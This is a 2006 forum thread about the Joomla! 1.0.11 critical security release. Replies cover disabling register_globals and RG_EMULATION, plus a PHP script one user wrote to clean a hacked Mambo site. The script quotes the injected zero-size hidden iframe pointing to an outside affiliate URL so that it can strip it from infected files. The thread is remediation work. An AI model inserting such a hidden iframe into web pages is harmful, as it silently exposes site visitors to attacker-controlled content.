Print Page - Upgrade immediately to Joomla! 1.0.11

Title: Upgrade immediately to Joomla! 1.0.11
Post by: chilly on August 29, 2006, 07:42:29 AM

This is a critical level announcement of Joomla.org!

Joomla! 1.0.11 [ Sunbird ] is now available as of Monday 28th August 2006 24:00 UTC for download here. and is being designated a Critical Security Release.
All existing Joomla! users MUST UPGRADE to this version, due to several High Level vulnerabilities that affect ALL Previous versions of Joomla!

1.0.11 contains the following critical security fixes:

* 04 High Level Security Fixes
* 04 Medium Level Security Fixes
* 18 Low Level security
* 25 General bug fixes

If you are using ANY previous version of Joomla!, you need to upgrade to 1.0.11 as soon as possible.

Project Joomla! is and has always been fully committed to a Security First Principle and new intiatives have and will continue to be started to reinforce and continue this principle. Joomla! 1.0.11 highlights a redoubled effort to put Security at the forefront of everyones lexicon.

IMPORTANT LINKS:
http://forum.joomla.org/index.php/topic,81058.0.html

http://www.joomla.org/content/view/1843/74/
http://forum.joomla.org/index.php/topic,89866.0.html

http://forum.joomla.org/index.php/topic,86525.0.html

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 29, 2006, 09:47:54 AM

Just like last time, it is imperative that you upgrade/patch your Joomla installs immediately to avoid the risk of having your site compromised.

If you have any questions, please post them here.

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 29, 2006, 10:44:43 AM

I've sent a notice on this and the other recent security releases to all clients:

http://www.charlottezweb.com/forums/index.php?topic=531.0

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: chilly on August 29, 2006, 11:15:55 AM

I'm backing up the directories/files that will be upgraded now.

I'll be upgrading immediately after that.

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 29, 2006, 11:27:43 AM

Quote from: chilly on August 29, 2006, 11:15:55 AM
I'm backing up the directories/files that will be upgraded now.

Yes, it's ALWAYS rule #1 to backup first! 8)

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: chilly on August 29, 2006, 01:39:03 PM

alright, I'm done, but I got this message in the Admin center:

Following PHP Server Settings are not optimal for Security and it is recommended to change them:

* PHP register_globals setting is `ON` instead of `OFF`
* Joomla! RG_EMULATION setting is `ON` instead of `OFF` in file globals.php
`ON` by default for compatibility reasons

Please check the Official Joomla! Server Security post for more information.

There is nothing in that post regarding this that I can see on how to turn register_globals to OFF

Help? Thanks :)

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 29, 2006, 01:48:04 PM

That's a server-wide setting.

You can override it for your account by creating a php.ini file within your site space.

http://www.charlottezweb.com/forums/index.php?topic=393.0

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 30, 2006, 08:07:57 PM

Quote from: chilly on August 29, 2006, 01:39:03 PM
* PHP register_globals setting is `ON` instead of `OFF`
* Joomla! RG_EMULATION setting is `ON` instead of `OFF` in file globals.php
`ON` by default for compatibility reasons

To followup on this...

I just fixed this on one site.

Create a php.ini file with the following line and upload it into public_html:

register_globals = 0

Then there's a file called globals.php already in your joomla folder.

Search for:

define( 'RG_EMULATION', 1 );

and change the 1 to 0:

define( 'RG_EMULATION', 0 );

That should do it.

-------
edit: I had the rg_emulation values backwards
-------

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: ariens on August 31, 2006, 10:37:38 AM

Dear Mambo users,

(Standard CYA Disclaimer: I offer zero guarentee's that this is going to work for you, if you follow any of my instructions please take the time to reserach the reprecutions of their actions. I provide this information as a guide only - that being said, this worked beautifully for my hacked mambo installation)

I'm tackling either this or a simmilar vulnerability in Mambo as well....

1) Ensure php is configured to have register globals off
2) in configuraiton.php...

Code Select


<?php
//change this....
$mosConfig_register_globals = '1';
//to...
$mosConfig_register_globals = '0';
?>

3) Ensure there are no writable php/html files within your document root that aren't required.

Now, a lot of my mambo html files has some crazy iFrame appended to them... the iframe's source was o00o.info/portal/....... I removed everything recursively by modifying a script I found on the Mambo board... this worked to remove the injected code that my Mambo site was suffering from, you may need to modify it for your own specific symptoms...

Code Select


<?php

ini_set('memory_limit', '256M');
ini_set('display_errors', 'on');
/**
 * Script used to restore compromised files
 */

define('_VALID_MOS', true);

echo 'Task started at: ' . date('H:i:s d-m-Y') . "\n";

$files = @mosReadDirectory('/var/www/testing.perfectpalletspostpress.com/', 'index.*', true, true);

echo '<pre>';
//print_r($files);

$k=0;
for($i=0,$n=count($files);$i<$n;$i++){
  $file = $files[$i];
  
  $f_content = @file_get_contents($file);
  if(preg_match('#o00o#is', $f_content)){
    echo "infected:" . $file . "\n";
    $f_content = str_replace('<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>', '', $f_content);
    
    $fp = fopen($file, 'w');
    if(!fwrite($fp, $f_content)){
    	echo "failed to fix file:" . $file . "\n";
    }
    fclose($fp);
    
    $k++;
  }
}


/**
* Utility function to read the files in a directory
* @param string The file system path
* @param string A filter for the names
* @param boolean Recurse search into sub-directories
* @param boolean True if to prepend the full path to the file name
*/
function mosReadDirectory( $path, $filter='.', $recurse=false, $fullpath=false  ) {
	$arr = array();
	if (!@is_dir( $path )) {
		return $arr;
	}
	$handle = opendir( $path );

	while ($file = readdir($handle)) {
		$dir = mosPathName( $path.'/'.$file, false );
		$isDir = is_dir( $dir );
		if (($file != ".") && ($file != "..")) {
			if (preg_match( "/$filter/", $file )) {
				if ($fullpath) {
					$arr[] = trim( mosPathName( $path.'/'.$file, false ) );
				} else {
					$arr[] = trim( $file );
				}
			}
			if ($recurse && $isDir) {
				$arr2 = mosReadDirectory( $dir, $filter, $recurse, $fullpath );
				$arr = array_merge( $arr, $arr2 );
			}
		}
	}
	closedir($handle);
	asort($arr);
	return $arr;
}

/**
* Function to strip additional / or \ in a path name
* @param string The path
* @param boolean Add trailing slash
*/
function mosPathName($p_path,$p_addtrailingslash = true) {
	$retval = "";

	$isWin = (substr(PHP_OS, 0, 3) == 'WIN');

	if ($isWin)	{
		$retval = str_replace( '/', '\\', $p_path );
		if ($p_addtrailingslash) {
			if (substr( $retval, -1 ) != '\\') {
				$retval .= '\\';
			}
		}
		// Remove double \\
		$retval = str_replace( '\\\\', '\\', $retval );
	} else {
		$retval = str_replace( '\\', '/', $p_path );
		if ($p_addtrailingslash) {
			if (substr( $retval, -1 ) != '/') {
				$retval .= '/';
			}
		}
		// Remove double //
		$retval = str_replace('//','/',$retval);
	}

	return $retval;
}
?>

Good Luck,
Dave Ariens
Lewis Media Inc.

Title: Re: Upgrade immediately to Joomla! 1.0.11
Post by: Jason on August 31, 2006, 02:36:16 PM

Thanks for the post Dave! I was wondering if Mambo was going to release an update...they hadn't at the time that the Joomla one was.

Charlottezweb

General Conversation => Script Chat => Topic started by: chilly on August 29, 2006, 07:42:29 AM